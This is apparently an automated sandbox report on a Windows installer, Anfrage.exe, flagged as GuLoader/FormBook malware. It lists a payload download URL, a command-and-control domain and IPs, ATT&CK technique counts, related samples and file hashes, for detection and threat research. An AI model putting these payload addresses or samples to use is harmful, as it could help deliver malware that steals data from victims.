            Source: Yara match | File source: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.2646605622.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            MITRE ATT&CK matrix (the number in parentheses is the count of matched signatures mapped to that technique)

            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Native API (1) | DLL Side-Loading (1) | Access Token Manipulation (1) | Masquerading (11) | OS Credential Dumping | Query Registry (1) | Remote Services | Archive Collected Data (1) | Encrypted Channel (11) | Exfiltration Over Other Network Medium | System Shutdown/Reboot (1)
            Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Process Injection (212) | Virtualization/Sandbox Evasion (1) | LSASS Memory | Security Software Discovery (221) | Remote Desktop Protocol | Clipboard Data (1) | Ingress Tool Transfer (1) | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Abuse Elevation Control Mechanism (1) | Access Token Manipulation (1) | Security Account Manager | Virtualization/Sandbox Evasion (1) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (2) | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | DLL Side-Loading (1) | Process Injection (212) | NTDS | Process Discovery (2) | Distributed Component Object Model | Input Capture | Application Layer Protocol (13) | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | File and Directory Discovery (2) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Abuse Elevation Control Mechanism (1) | Cached Domain Credentials | System Information Discovery (23) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Obfuscated Files or Information (3) | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading (1) | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Source | Detection | Scanner | Label
            Anfrage.exe | 53% | ReversingLabs | Win32.Trojan.GuLoader
            Anfrage.exe | 100% | Avira | HEUR/AGEN.1361137
            Source | Detection | Scanner | Label
            C:\Users\user\AppData\Local\Temp\nskF5B7.tmp\System.dll | 0% | ReversingLabs |
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label
            https://familytherapycenter.rs/JWXOdIrgRlshLWuPJxOk219.binM | 0% | Avira URL Cloud | safe
            https://familytherapycenter.rs/JWXOdIrgRlshLWuPJxOk219.binI | 0% | Avira URL Cloud | safe
            https://familytherapycenter.rs/JWXOdIrgRlshLWuPJxOk219.bin | 0% | Avira URL Cloud | safe
            https://familytherapycenter.rs/JWXOdIrgRlshLWuPJxOk219.binLeg | 0% | Avira URL Cloud | safe
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            familytherapycenter.rs | 188.40.95.144 | true | false | | high
            7fh27o.vip | 3.33.130.190 | true | true | | unknown
            www.7fh27o.vip | unknown | unknown | false | | unknown
            Name | Malicious | Antivirus Detection | Reputation
            https://familytherapycenter.rs/JWXOdIrgRlshLWuPJxOk219.bin | false | Avira URL Cloud: safe | unknown
            Name | Source | Malicious | Antivirus Detection | Reputation
            http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd | Anfrage.exe, 00000007.00000001.2121368668.00000000005F2000.00000020.00000001.01000000.00000007.sdmp | false | | high
            http://www.ftp.ftp://ftp.gopher. | Anfrage.exe, 00000007.00000001.2121368668.0000000000649000.00000020.00000001.01000000.00000007.sdmp | false | | high
            https://familytherapycenter.rs/JWXOdIrgRlshLWuPJxOk219.binI | Anfrage.exe, 00000007.00000003.2389055505.0000000006298000.00000004.00000020.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000002.2484828472.000000000629A000.00000004.00000020.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000003.2389278844.0000000006298000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | Anfrage.exe, 00000007.00000001.2121368668.00000000005F2000.00000020.00000001.01000000.00000007.sdmp | false | | high
            http://nsis.sf.net/NSIS_Error | Anfrage.exe, Anfrage.exe, 00000000.00000000.1402818143.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Anfrage.exe, 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Anfrage.exe, 00000007.00000000.2118674317.000000000040A000.00000008.00000001.01000000.00000003.sdmp | false | | high
            http://nsis.sf.net/NSIS_ErrorError | Anfrage.exe, 00000000.00000000.1402818143.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Anfrage.exe, 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Anfrage.exe, 00000007.00000000.2118674317.000000000040A000.00000008.00000001.01000000.00000003.sdmp | false | | high
            https://familytherapycenter.rs/ | Anfrage.exe, 00000007.00000002.2484575388.0000000006285000.00000004.00000020.00020000.00000000.sdmp | false | | high
            https://familytherapycenter.rs/JWXOdIrgRlshLWuPJxOk219.binLeg | Anfrage.exe, 00000007.00000002.2484575388.0000000006248000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://familytherapycenter.rs/JWXOdIrgRlshLWuPJxOk219.binM | Anfrage.exe, 00000007.00000002.2484575388.0000000006285000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | Anfrage.exe, 00000007.00000001.2121368668.0000000000649000.00000020.00000001.01000000.00000007.sdmp | false | | high
            IP | Domain | Country | ASN | ASN Name | Malicious
            188.40.95.144 | familytherapycenter.rs | Germany | 24940 | HETZNER-ASDE | false
            3.33.130.190 | 7fh27o.vip | United States | 8987 | AMAZONEXPANSIONGB | true
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1553562
                                Start date and time:2024-11-11 12:02:21 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 8m 37s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                 Number of new started processes analysed:10
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:2
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:Anfrage.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@5/10@2/2
                                EGA Information:
                                • Successful, ratio: 75%
                                HCA Information:
                                • Successful, ratio: 94%
                                • Number of executed functions: 118
                                • Number of non-executed functions: 350
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target mrdYGoZBmXi.exe, PID 5252 because it is empty
                                 • Not all processes were analyzed, report is missing behavior information
                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                • VT rate limit hit for: Anfrage.exe
                                No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
188.40.95.144 | Anfrage_244384.exe | malicious | FormBook, GuLoader |
188.40.95.144 | Anfrage_244384.exe | malicious | FormBook, GuLoader |
188.40.95.144 | Anfrage244384.exe | malicious | FormBook, GuLoader |
188.40.95.144 | Anfrage244384.exe | malicious | FormBook, GuLoader |
188.40.95.144 | Anfrage_244384.exe | malicious | FormBook, GuLoader |
188.40.95.144 | 5112024976.exe | malicious | FormBook, GuLoader |
188.40.95.144 | 5112024976.exe | malicious | FormBook, GuLoader |
188.40.95.144 | Anfrage24438.zip | malicious | FormBook, GuLoader |
188.40.95.144 | Anfrage24438.exe | malicious | FormBook, GuLoader |
188.40.95.144 | Anfrage24438.exe | malicious | FormBook, GuLoader |
3.33.130.190 | seethebestthingsneedtodowithgreatthingshappenedonheretosee.hta | malicious | Cobalt Strike, FormBook, HTMLPhisher | www.starseedtechs.net/cga4/
3.33.130.190 | PO No-5100002069 Sr. No. 11 & PO No-5100002072 Sr. No. 8,10,17..exe | malicious | FormBook | www.co2cartridges.net/clyj/
3.33.130.190 | shipping doc_20241111.exe | malicious | FormBook | www.loginov.enterprises/y0sc/
3.33.130.190 | fHkdf4WB7zhMcqP.exe | malicious | FormBook | www.mythkitchen.net/jpec/
3.33.130.190 | New PO [FK4-7173].pdf.exe | malicious | FormBook | www.7fh27o.vip/9lti/
3.33.130.190 | AWB_NO_907853880911.exe | malicious | FormBook | www.dccf.earth/n41a/
3.33.130.190 | RFQ.exe | malicious | FormBook | www.bio-thymus.com/ezyn/
3.33.130.190 | xBzBOQwywT.exe | malicious | FormBook | www.doggieradio.net/szy7/
3.33.130.190 | ByuoedHi2e.exe | malicious | FormBook | www.optimallogics.services/xw8x/
3.33.130.190 | Y7isAhMKal.exe | malicious | FormBook | www.vincemachi.net/zg1y/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
familytherapycenter.rs | Anfrage_244384.exe | malicious | FormBook, GuLoader | 188.40.95.144
familytherapycenter.rs | Anfrage_244384.exe | malicious | FormBook, GuLoader | 188.40.95.144
familytherapycenter.rs | Anfrage244384.exe | malicious | FormBook, GuLoader | 188.40.95.144
familytherapycenter.rs | Anfrage244384.exe | malicious | FormBook, GuLoader | 188.40.95.144
familytherapycenter.rs | Anfrage_244384.exe | malicious | FormBook, GuLoader | 188.40.95.144
familytherapycenter.rs | 5112024976.exe | malicious | FormBook, GuLoader | 188.40.95.144
familytherapycenter.rs | 5112024976.exe | malicious | FormBook, GuLoader | 188.40.95.144
familytherapycenter.rs | Anfrage24438.zip | malicious | FormBook, GuLoader | 188.40.95.144
familytherapycenter.rs | Anfrage24438.exe | malicious | FormBook, GuLoader | 188.40.95.144
familytherapycenter.rs | Anfrage24438.exe | malicious | FormBook, GuLoader | 188.40.95.144
Match | Associated Sample Name / URL | Detection | Threat Name | Context
HETZNER-ASDE | shindemips.elf | malicious | Unknown | 144.79.204.133
HETZNER-ASDE | 5r3fqt67ew531has4231.m68k.elf | malicious | Mirai, Okiru | 188.40.247.90
HETZNER-ASDE | 1.cmd | malicious | Unknown | 195.201.57.90
HETZNER-ASDE | Exploit Detector.bat | malicious | Unknown | 195.201.57.90
HETZNER-ASDE | Exploit Detector LIST (2).bat | malicious | Unknown | 195.201.57.90
HETZNER-ASDE | yde4cz.cmd | malicious | Unknown | 195.201.57.90
HETZNER-ASDE | PqSIlYOaIF.exe | malicious | LummaC, Xmrig | 78.47.21.153
                                                    https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwi2-r-EpciJAxVQ_8kDHavKJD4QFnoECBYQAQ&usg=AOvVaw0b8qPBQnhqFT1nkSOYsQHT&opi=89978449&url=amp%2Fnew.wowf.org.in%2Fphp%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2F/Get hashmaliciousUnknownBrowse
                                                    • 49.12.80.157
HETZNER-ASDE | https://geett10.z6.web.core.windows.net/werrx01USAHTML/?bcda=18338461279# | malicious | TechSupportScam | 195.201.57.90
HETZNER-ASDE | Anfrage_244384.exe | malicious | FormBook, GuLoader | 188.40.95.144
AMAZONEXPANSIONGB | seethebestthingsneedtodowithgreatthingshappenedonheretosee.hta | malicious | Cobalt Strike, FormBook, HTMLPhisher | 3.33.130.190
AMAZONEXPANSIONGB | PO No-5100002069 Sr. No. 11 & PO No-5100002072 Sr. No. 8,10,17..exe | malicious | FormBook | 3.33.130.190
AMAZONEXPANSIONGB | GE AEROSPACE _WIRE REMITTANCE.xlsx | malicious | Unknown | 52.223.1.163
AMAZONEXPANSIONGB | shipping doc_20241111.exe | malicious | FormBook | 3.33.130.190
AMAZONEXPANSIONGB | fHkdf4WB7zhMcqP.exe | malicious | FormBook | 3.33.130.190
AMAZONEXPANSIONGB | New PO [FK4-7173].pdf.exe | malicious | FormBook | 3.33.130.190
AMAZONEXPANSIONGB | http://jobs.sixlfags.com | malicious | Unknown | 3.33.148.61
AMAZONEXPANSIONGB | https://ascerta.aha.io/shared/edaa0f8ea0ea06d13e545667a40fae36 | malicious | Unknown | 3.33.220.150
AMAZONEXPANSIONGB | Le55bnMCON.msi | malicious | AteraAgent | 52.223.39.232
AMAZONEXPANSIONGB | kTbv9ZA2x0.msi | malicious | AteraAgent | 52.223.39.232
Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | Quotation.exe | malicious | AgentTesla, GuLoader | 188.40.95.144
37f463bf4616ecd445d4a1937da06e19 | Request for Quotation 11-11-2024#U00b7pdf.vbs | malicious | Remcos, GuLoader | 188.40.95.144
37f463bf4616ecd445d4a1937da06e19 | 074c592b-5cc0-496d-b3fa-45a09d4363ce#U00b7pdf.vbs | malicious | Remcos, GuLoader | 188.40.95.144
37f463bf4616ecd445d4a1937da06e19 | rPO3799039985.exe | malicious | Remcos, GuLoader | 188.40.95.144
37f463bf4616ecd445d4a1937da06e19 | Rechnung_10401.js | malicious | ScreenConnect Tool | 188.40.95.144
37f463bf4616ecd445d4a1937da06e19 | A322mb7u3h.exe | malicious | Unknown | 188.40.95.144
37f463bf4616ecd445d4a1937da06e19 | C6y77dS3l7.exe | malicious | Unknown | 188.40.95.144
37f463bf4616ecd445d4a1937da06e19 | Wiu8X6685m.exe | malicious | Unknown | 188.40.95.144
37f463bf4616ecd445d4a1937da06e19 | WUa1Tm8Dlv.exe | malicious | Unknown | 188.40.95.144
37f463bf4616ecd445d4a1937da06e19 | XOr3Kqyo9n.exe | malicious | Stealc | 188.40.95.144
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Local\Temp\nskF5B7.tmp\System.dll | Anfrage_244384.exe | malicious | FormBook, GuLoader |
C:\Users\user\AppData\Local\Temp\nskF5B7.tmp\System.dll | Anfrage_244384.exe | malicious | FormBook, GuLoader |
C:\Users\user\AppData\Local\Temp\nskF5B7.tmp\System.dll | Anfrage244384.exe | malicious | FormBook, GuLoader |
C:\Users\user\AppData\Local\Temp\nskF5B7.tmp\System.dll | Anfrage244384.exe | malicious | FormBook, GuLoader |
C:\Users\user\AppData\Local\Temp\nskF5B7.tmp\System.dll | Anfrage_244384.exe | malicious | FormBook, GuLoader |
C:\Users\user\AppData\Local\Temp\nskF5B7.tmp\System.dll | 5112024976.exe | malicious | FormBook, GuLoader |
C:\Users\user\AppData\Local\Temp\nskF5B7.tmp\System.dll | 5112024976.exe | malicious | FormBook, GuLoader |
C:\Users\user\AppData\Local\Temp\nskF5B7.tmp\System.dll | Anfrage24438.zip | malicious | FormBook, GuLoader |
C:\Users\user\AppData\Local\Temp\nskF5B7.tmp\System.dll | Anfrage24438.exe | malicious | FormBook, GuLoader |
C:\Users\user\AppData\Local\Temp\nskF5B7.tmp\System.dll | Anfrage24438.exe | malicious | FormBook, GuLoader |
                                                                        Process:C:\Users\user\Desktop\Anfrage.exe
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):11264
                                                                        Entropy (8bit):5.7711167426271945
                                                                        Encrypted:false
                                                                        SSDEEP:192:OPtkumJX7zB22kGwfy0mtVgkCPOsX1un:/702k5qpdsXQn
                                                                        MD5:3F176D1EE13B0D7D6BD92E1C7A0B9BAE
                                                                        SHA1:FE582246792774C2C9DD15639FFA0ACA90D6FD0B
                                                                        SHA-256:FA4AB1D6F79FD677433A31ADA7806373A789D34328DA46CCB0449BBF347BD73E
                                                                        SHA-512:0A69124819B7568D0DEA4E9E85CE8FE61C7BA697C934E3A95E2DCFB9F252B1D9DA7FAF8774B6E8EFD614885507ACC94987733EBA09A2F5E7098B774DFC8524B6
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: Anfrage_244384.exe, Detection: malicious
• Filename: Anfrage_244384.exe, Detection: malicious
• Filename: Anfrage244384.exe, Detection: malicious
• Filename: Anfrage244384.exe, Detection: malicious
• Filename: Anfrage_244384.exe, Detection: malicious
• Filename: 5112024976.exe, Detection: malicious
• Filename: 5112024976.exe, Detection: malicious
• Filename: Anfrage24438.zip, Detection: malicious
• Filename: Anfrage24438.exe, Detection: malicious
• Filename: Anfrage24438.exe, Detection: malicious
                                                                        Reputation:moderate, very likely benign file
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L.....MX...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text...O........................... ..`.rdata..S....0......."..............@..@.data...h....@.......&..............@....reloc..`....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\Desktop\Anfrage.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):297136
                                                                        Entropy (8bit):7.632126679137234
                                                                        Encrypted:false
                                                                        SSDEEP:6144:jbxbyYHPcCcEbP3ze4kNJ3q8rjqFxIDPuBnwd2v2a3:HxbwP8uJ66qF0PanDH
                                                                        MD5:4CD296B7BD907DC035E99052D2D2AA3D
                                                                        SHA1:AEC56F618689CD8FB2FFF4C8185B3EB6F57721BF
                                                                        SHA-256:3F58F2B58267E5D7C1AE5B442330D825E6AEF13F9D5EEFE57CB00B327FC1985C
                                                                        SHA-512:D571B90781CE3192122DDB01A30219E82D3CD643DC9E4729B75C2E087679F6364469771B2B8012AC2EE0A8DAE7375B58DC8B013E5354D98A19306A3E26700756
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:.................f.....H.........555..........V....\............Y........O...........<<.......===.............TTT.........b..........................VV.%%%%%.....]]]]].........................................n...$............L...FF.l.X......3.K........@@.................................ll.........pppp......................#...k..+.............PP...*..._.W.).......P..............H.WWWW......................3..............ee....%%%%%........................'''.......................----....sss....AAAA.......B.....7....../...................................w......ZZ.....//...........(((.'''..d.W.....&&..III.....zzzzzz...].....nn.......................4........,,.....II............M.{..|....)))..........................................................................................---.............................................Z.I.....>........z..Q...ee.ggg...}.....7.kkk.........{...................................:.z..||||......Q........L...........................HH.V..................
                                                                        Process:C:\Users\user\Desktop\Anfrage.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):79507
                                                                        Entropy (8bit):4.599504703692736
                                                                        Encrypted:false
                                                                        SSDEEP:1536:XekPOcV6w7ih0z4+l77pFzfeSBYpXAMeYXFKf:XeQOG7dFzfeH6MKf
                                                                        MD5:1500C8A25FC49EBA0CD91C504A908DA4
                                                                        SHA1:D33C4DBD322078F9BBC0FAF5B3706B365FC1FEAD
                                                                        SHA-256:25C4FB45922AB379ED593E544E7DAD0C91F10C60752744C2DA6FA657B819ADD3
                                                                        SHA-512:9D8B1BDDD0285B06FA22A91ED0C228946C377D3175E3B8A76B48ED1FF7B6B2219209637065ED5AC7A70C2BBA0FC6466DC55E0B4794364D904DFD5A40773E1505
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:..K...............................*.....ss..................O........``......:..b...''.....XXX..........................................55.C.......................ooo...........K..............4.........<..........====.............S.{..w..............nnnn....9.......nnn.........TT.............a...............S.n.F......:.......^^.Y.kk.....33.bb...VV...............CC....................i............c....................Z...............@@..............................66.o..............e..............f.,....]]].^.....P..............kkk...........PP........................H.......z..............yyy..............((......pppp.......,,,,,.....11.................qq......}.AAA................y................e.........Q.............H.............Q.LLL........77...,,,.........///......cccc.....+.7...................DD.......*......................YY.......%.Y......++.........J...-........EE..............................q.........jjjj...ppp.//////..n.......RRR........z.............................
                                                                        Process:C:\Users\user\Desktop\Anfrage.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):476422
                                                                        Entropy (8bit):1.2552031449987011
                                                                        Encrypted:false
                                                                        SSDEEP:1536:zGmPxn4XjZOVebnJjvYbTUBhGKcjnO/EeMHPm:Sm6zYVb849nH6
                                                                        MD5:F236A74F28F6F32F81F1347D9F129268
                                                                        SHA1:D5BE521661EE4BF3C186C3EAA0411DD5DF6F3EBA
                                                                        SHA-256:BEED12F00B12156FF9FA63595DE11A5C01493CF5F85488CB2E159CF1A8236778
                                                                        SHA-512:D6AD37DDF7B6B38B90F09186AC81C6A76F16F9A4613D6113F10D7B2A4F68129E570EFFC77A19B04F276277B7A569EBD5FD4A48D2E2E72CEA8CEE5A8F67CC5EF4
                                                                        Malicious:false
                                                                        Reputation:moderate, very likely benign file
                                                                        Preview:.................................................................7...........................).....$....%..........................#.....M.....................................6.........N.........).......................................................................................a..............t..................................................T.........................................@...........................+..U...................A'..............L..................................................../.............2..............k.........................................................................................................&.............................................>...........................................................|..........................?...............................&...................................n.q......}....................................E......................................................p........................................6..........
                                                                        Process:C:\Users\user\Desktop\Anfrage.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):448073
                                                                        Entropy (8bit):1.2554221597008608
                                                                        Encrypted:false
                                                                        SSDEEP:1536:i9EUBeeNEu//hQg77ea6OP/B1p7to4APRUYZAkxe:qFZO5u/B1pBo510
                                                                        MD5:3AD8D5763CA124C7392D1F4F53D24F0E
                                                                        SHA1:17D48EF1AB8D52A31821A069C225D45201535899
                                                                        SHA-256:3965D74DBD296AA8E7524C773FE81FE63A78355145502153CB577E9CB136DDA0
                                                                        SHA-512:EE8BDE196A33297BFD4E51ED01E7D0178CF457497E822771D2BE3C58A97681AC52CD19A2BBBB71220F06F6D936A6AA67966295DF3C676104B9643F07CBE37EC8
                                                                        Malicious:false
                                                                        Reputation:moderate, very likely benign file
                                                                        Preview:............y...k......... ....L..............................................................c....................d...........................p..............R.................................................5...............f.......{......................................................................................J...........@.................E....h...............0................M.................'..............................................-...............Z.........................{...............T............c.W..............n....................H...........................................|...................................^...........w.................c...............................).....................................y.....<.......................................T........................................................3.....S..<.......?........................................1!......^.............................t................................................G........
                                                                        Process:C:\Users\user\Desktop\Anfrage.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):362911
                                                                        Entropy (8bit):1.2562704713226092
                                                                        Encrypted:false
                                                                        SSDEEP:768:uFKWW9YiDlIMhmjVacve6tEvHBLNB3tQsrTpPH8mZLAUFwsahGF48hDpWRcKthwz:u5W9yMJLNbJ1CbFV3Gd6Ie48dPs
                                                                        MD5:8AB9852274FA64E09B5711A2E7D94AAB
                                                                        SHA1:2C39272B969040B4C185EE4A69A5F04FD1F7C0DB
                                                                        SHA-256:FCD149788A3530E5E2CF5E17A09B1DE51EB67B51F3E8941E7091F88B610373F1
                                                                        SHA-512:6761208A22E8D93D70465E6DD9CF1B53826AA6BF0418DCCB0A6E5816A183790A61AD67EDCF52D21366975014701107563CE47A0465CEE801300493AEB566CC69
                                                                        Malicious:false
                                                                        Preview:....-......................................................................?d..........\.a.....................................8...............x...........e...................................)...............+..............................................i...................................................................................................................4......j................................................................................"......................................Z.....%...................................................................................................F............................................................................g...............................E./.....................................................................................Y........#.......F.......n.M.........................................................................................................................W..................................................
                                                                        Process:C:\Users\user\Desktop\Anfrage.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):497
                                                                        Entropy (8bit):4.296439217688297
                                                                        Encrypted:false
                                                                        SSDEEP:12:kdESMQrs7ZnIyxrqlLIRF0+UAkN0lCGsMqejQlJ8:QjMfpIuqPAEsOi
                                                                        MD5:1560371431CEB91914AF5B9D0D307EE1
                                                                        SHA1:182B8979D4D0F9F26366653638A9C92FDAFF0D56
                                                                        SHA-256:72A2010CDB6ED407FCA17CDB181D5F01801F16040C2C9443BD7CB5032CDAAEF7
                                                                        SHA-512:865EF0F7636149A47043183583635C2A4306BF49565166760672B88F0F9DA89A529FE4166DFF496327304E56A8A460B8113E5F3D58601C0B8A3EFAABD792AF3D
                                                                        Malicious:false
                                                                        Preview:avenging piktogrammernes duecento korsedderkop skurvognsudlejningernes fnges ranaria..kavitet ubetalelige forhalingen passado nautically formaalsbestemmelsernes admiralsuniformers..franchot unimposing rimfire.bemba barsac unflaked skbnesvanger.tige backchats leveret viktualieforretningernes processal dignitas altica epoxyharpikset sergenter forureningsbegrnsedes..sforsvaret antiquating photomechanically enighedernes firepot megrez almon aeneus madrassen thrallborn denoteres slipup tvebakken..
                                                                        Process:C:\Users\user\Desktop\Anfrage.exe
                                                                        File Type:Matlab v4 mat-file (little endian) Y, numeric, rows 0, columns 0
                                                                        Category:dropped
                                                                        Size (bytes):354845
                                                                        Entropy (8bit):1.2446363869824946
                                                                        Encrypted:false
                                                                        SSDEEP:768:E2oz5FNvncy2DZRau7W0sxOvPfSfpg5rWuWAAUIdde/FwPPMk/FOuyQv9biuPia6:opho02mYrKiKLFyJ1AIu2
                                                                        MD5:DF7A44909B03AB5BC45910B405D9977A
                                                                        SHA1:3D0583A7DFB39E559827189E02123F2C983A21D5
                                                                        SHA-256:5A3B61A0BC8E81E756374D2A9FF5087FA4496543A635738ACA8911E95D6340D9
                                                                        SHA-512:C2B4E951A185FC3FB75109B5CAA554431C1517588D04B8F2BA865F75BE448A0448364BCB84253C9B44579078787DDA616F33666C0C1BF902EC644EBC9A6FE621
                                                                        Malicious:false
                                                                        Preview:..................%.Y.............................[......................z...........................................8.................{................b.......W..........................................#.........................................%....z..................7......................................x.i...+............................................................................8......................................................................................................................-..3..................................................................................|............T...........................#...........\.....A.............................................7..........'.................... ...................].................J.J..........s................................g..............W........................................................................................................$...g..........................................................
                                                                        Process:C:\Users\user\Desktop\Anfrage.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):298017
                                                                        Entropy (8bit):1.245520550165085
                                                                        Encrypted:false
                                                                        SSDEEP:768:nLoDoRi0SWvTrmnVqvh6dzfCaci65UhXqjMctTGA3QBgdRWqrw3q3LFPRvx7H155:DStBsLk6gsifeQIGA0iYRwvy8n
                                                                        MD5:B4C9FC75BAB8C9F006A7D9DDBC249F79
                                                                        SHA1:70D4047E7E3BB10CF237B82775C89A1D92700162
                                                                        SHA-256:1D84F9462C244A4500C213DF8DD79971B286392CA02BC536F5F6C3EEBC94E7E3
                                                                        SHA-512:2E2279CB3755AC5708ABB30E8342235B7F0A24223E3D6F4B2B21B62E59012A5126ADC1BD73D7B64E72634728DECCE7A049D3E6F5055F8D74E959BEE54EDBEA4C
                                                                        Malicious:false
                                                                        Process:C:\Users\user\Desktop\Anfrage.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):497497
                                                                        Entropy (8bit):1.2525295412969446
                                                                        Encrypted:false
                                                                        SSDEEP:1536:rbNZ/Rg8JCCgxT2eIgde/lBWTTBwGceukAdTYz91n6n:9NRg836IVLWHeGxKYQ
                                                                        MD5:F3F6C6E37EAB51D3B9B9C059C1EB874C
                                                                        SHA1:401E5740CCFBC1DA83BD9B426C11020C812986F2
                                                                        SHA-256:B5A607F50C65E41B2BFF7F852F27373177D326D9DFA1040E1C2B3AF62F757BAB
                                                                        SHA-512:060B328595ADAF9E85B390AA2AACEEFE4C6197294B7C45594798755C5E04BE1E2110F617B51E38D7DF423CD807FA81B30702CE2548563980B9CA195ECF2C11A7
                                                                        Malicious:false
                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                        Entropy (8bit):7.583566729182234
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:Anfrage.exe
                                                                        File size:1'251'520 bytes
                                                                        MD5:71ea800a6b7644be75507e3b74e3cce2
                                                                        SHA1:aa1ac653b8d942a98770538d3e1fb325491cab45
                                                                        SHA256:e81a266ca8fee88c3eee94cea7494225e905354c9e31635683467fbfe7844d91
                                                                        SHA512:343e413312eabe6dd29e6e4d567eb70ec49d8d7e1d004a71e000896046dd33dc81928cbfebb68bd763eba2bcca3bf729abf05473361728a328aaf66c5a430eed
